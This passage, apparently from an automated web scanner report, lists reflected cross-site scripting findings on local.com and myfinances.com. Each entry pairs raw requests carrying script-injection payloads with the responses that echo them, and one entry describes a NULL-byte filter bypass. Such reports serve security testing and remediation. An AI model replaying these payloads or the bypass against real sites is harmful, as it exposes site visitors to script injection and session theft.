GET /results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style%3d"x%3aexpression(alert(1))"043ffc8a60a=1 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 130504
Date: Thu, 03 Feb 2011 15:56:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=bzp0h255qcweve45j0rd4z55; path=/; HttpOnly
Set-Cookie: localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=639a705c-136b-485f-8a3e-16b57e26ba7b&expdate=634349086150332423&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js%269a378%22style%253d%22x%253aexpression(alert(1))%22043ffc8a60a%3d1&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:56:55 GMT; path=/
Set-Cookie: localcom_s=cid=506&exp=634323184150332423; domain=local.com; expires=Thu, 03-Feb-2011 16:26:55 GMT; path=/
Content-Length: 130504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
<select class="fl mR15" style="width:100px" onchange="location.href = 'http://www.local.com/results.aspx?keyword=banks&cid=506&client=ca-dp-r-mark03_3ph_js&9a378"style="x:expression(alert(1))"043ffc8a60a=1&sort=$&page=1'.replace('$', this.options[this.selectedIndex].value);">
...[SNIP]...

4.479. http://www.local.com/topics/ [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.local.com
Path:   /topics/

Issue detail

The value of the keyword request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0f6f"%3bb0022a17af6 was submitted in the keyword parameter. This input was echoed as b0f6f";b0022a17af6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /topics/?topic=food&keyword=foodb0f6f"%3bb0022a17af6 HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 33965
Date: Thu, 03 Feb 2011 16:51:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:21 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=foodb0f6f%22%3bb0022a17af6; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 33965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
<script type="text/javascript">
s.pageName="Topics - Landing - Food";
s.prop1="foodb0f6f";b0022a17af6";
s.prop2="";
s.prop4="Dallas, TX";
s.prop5="v3:Topics - Landing - Food";
s.prop8="Organic";
s.campaign = "506c80ba
...[SNIP]...

4.480. http://www.local.com/ver1.0/Direct/Jsonp [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 8cbb2<script>alert(1)</script>2eab8d1e87a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:06:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 188

RequestBatch.callbacks.daapiCallback08cbb2<script>alert(1)</script>2eab8d1e87a({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"02/03/2011 08:06:04:885 AM"}],"Responses":[]}});

4.481. http://www.local.com/ver1.0/ReviewPage.app [articleKey parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/ReviewPage.app

Issue detail

The value of the articleKey request parameter is copied into the HTML document as plain text between tags. The payload 76469<script>alert(1)</script>5cd27d00a02 was submitted in the articleKey parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ver1.0/ReviewPage.app?onPage=1&reviewsPerPage=10&articleKey=10482693776469<script>alert(1)</script>5cd27d00a02&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com&rand=1296748922751 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:06:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 657

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,
"ReviewOnKey": {
"Key": "10482693776469<script>alert(1)</script>5cd27d00a02",
"ObjectType": "Models.External.ExternalResourceKey"
},
"ItemsPerPage": 10,
"ObjectType": "Responses.Reactions.ReviewsPageResponse",
"Items": [],
"OneBasedOnPage": 1,
...[SNIP]...

4.482. http://www.myfinances.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af164"><script>alert(1)</script>bfea6dcd612 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?af164"><script>alert(1)</script>bfea6dcd612=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:03:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:03:03 GMT
Content-Length: 17806
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<input type="hidden" name="back" value="/?af164"><script>alert(1)</script>bfea6dcd612=1" />
...[SNIP]...

4.483. http://www.myfinances.com/blog.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b441b'><script>alert(1)</script>2d6ce3f1de5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1 HTTP/1.1
Host: www.myfinances.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 16:26:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 16:26:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: adc=RSP; path=/;
Content-Length: 17748

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?b441b'><script>alert(1)</script>2d6ce3f1de5=1&page=1'>
...[SNIP]...

4.484. http://www.myfinances.com/blog.html [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog.html

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload %007485b'><script>alert(1)</script>abffe3120a4 was submitted in the page parameter. This input was echoed as 7485b'><script>alert(1)</script>abffe3120a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /blog.html?page=1%007485b'><script>alert(1)</script>abffe3120a4 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:01:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:01:58 GMT
Content-Length: 17623
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a href='/blog.html?%007485b'><script>alert(1)</script>abffe3120a4&page=1'>
...[SNIP]...

4.485. http://www.myfinances.com/blog/3171093.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171093.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e47d"><script>alert(1)</script>cddac6d471e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:23 GMT
Content-Length: 13431
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How The Dow Jones Industrial Average Is Calculated' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171093.html?9e47d"><script>alert(1)</script>cddac6d471e=1'">
...[SNIP]...

4.486. http://www.myfinances.com/blog/3171103.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3171103.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c279"><script>alert(1)</script>be8d26e1d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:21 GMT
Content-Length: 13823
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Know If You're On Track For Retirement' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3171103.html?5c279"><script>alert(1)</script>be8d26e1d8b=1'">
...[SNIP]...

4.487. http://www.myfinances.com/blog/3227953.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227953.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434d0"><script>alert(1)</script>5608a968905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1 HTTP/1.1
Host: www.myfinances.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Expires: Thu, 03 Feb 2011 17:05:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 03 Feb 2011 17:05:13 GMT
Content-Length: 14027
Connection: close
Set-Cookie: adc=RSP; path=/;

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta name="generator" content="1b0d0ec2fefe4b82a285
...[SNIP]...
<a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Estimate the Value of Your Home' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3227953.html?434d0"><script>alert(1)</script>5608a968905=1'">
...[SNIP]...

4.488. http://www.myfinances.com/blog/3227963.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myfinances.com
Path:   /blog/3227963.html

Issue detail

